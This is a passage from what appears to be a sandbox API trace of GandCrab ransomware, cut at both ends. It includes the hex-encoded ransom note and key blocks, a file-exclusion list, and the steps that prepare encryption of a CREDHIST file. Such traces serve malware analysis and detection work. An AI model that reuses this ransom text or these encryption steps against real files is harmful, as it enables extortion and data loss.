75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0072.972] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0072.973] CloseHandle (hObject=0x2bc) returned 1 [0072.974] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.974] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.974] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x12, wMilliseconds=0x125)) [0072.974] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.974] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0072.975] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0072.975] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\d2ca4a09d2ca4deb61a.lock") returned 80 [0072.975] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0072.975] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.975] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.976] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\") returned 56 [0072.976] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\*" [0072.976] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x503478 [0072.976] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.976] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.976] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.976] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.976] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.976] lstrcmpW (lpString1="CREDHIST", lpString2=".") returned 1 [0072.976] lstrcmpW (lpString1="CREDHIST", lpString2="..") returned 1 [0072.976] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="CREDHIST" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" [0072.976] lstrlenW (lpString=".titwmvjl") returned 9 [0072.976] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 64 [0072.976] VirtualAlloc (lpAddress=0x0, dwSize=0xc0, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.976] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.titwmvjl") returned 73 [0072.976] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 64 [0072.976] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 64 [0072.976] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 64 [0072.976] lstrcmpiW (lpString1="CREDHIST", lpString2="desktop.ini") returned -1 [0072.976] lstrcmpiW (lpString1="CREDHIST", lpString2="autorun.inf") returned 1 [0072.976] lstrcmpiW (lpString1="CREDHIST", lpString2="ntuser.dat") returned -1 [0072.977] lstrcmpiW (lpString1="CREDHIST", lpString2="iconcache.db") returned -1 [0072.977] lstrcmpiW (lpString1="CREDHIST", lpString2="bootsect.bak") returned 1 [0072.977] lstrcmpiW (lpString1="CREDHIST", lpString2="boot.ini") returned 1 [0072.977] lstrcmpiW (lpString1="CREDHIST", lpString2="ntuser.dat.log") returned -1 [0072.977] lstrcmpiW (lpString1="CREDHIST", lpString2="thumbs.db") returned -1 [0072.977] lstrcmpiW (lpString1="CREDHIST", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0072.977] lstrcmpiW (lpString1="CREDHIST", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0072.977] lstrcmpiW (lpString1="CREDHIST", lpString2="KRAB-DECRYPT.html") returned -1 [0072.977] lstrcmpiW (lpString1="CREDHIST", lpString2="CRAB-DECRYPT.html") returned 1 [0072.977] lstrcmpiW (lpString1="CREDHIST", lpString2="KRAB-DECRYPT.txt") returned -1 [0072.977] lstrcmpiW (lpString1="CREDHIST", lpString2="CRAB-DECRYPT.txt") returned 1 [0072.977] lstrcmpiW (lpString1="CREDHIST", lpString2="ntldr") returned -1 [0072.977] lstrcmpiW (lpString1="CREDHIST", lpString2="NTDETECT.COM") returned -1 [0072.977] lstrcmpiW (lpString1="CREDHIST", lpString2="Bootfont.bin") returned 1 [0072.977] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 64 [0072.977] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.977] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\credhist"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0072.977] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0072.977] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.978] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0072.978] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0072.978] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0072.978] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0072.978] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0072.978] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.978] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0072.978] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.979] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.979] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0072.979] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0072.979] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0072.979] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0072.979] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0072.980] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.980] CryptReleaseContext (hProv=0x4cdb38, 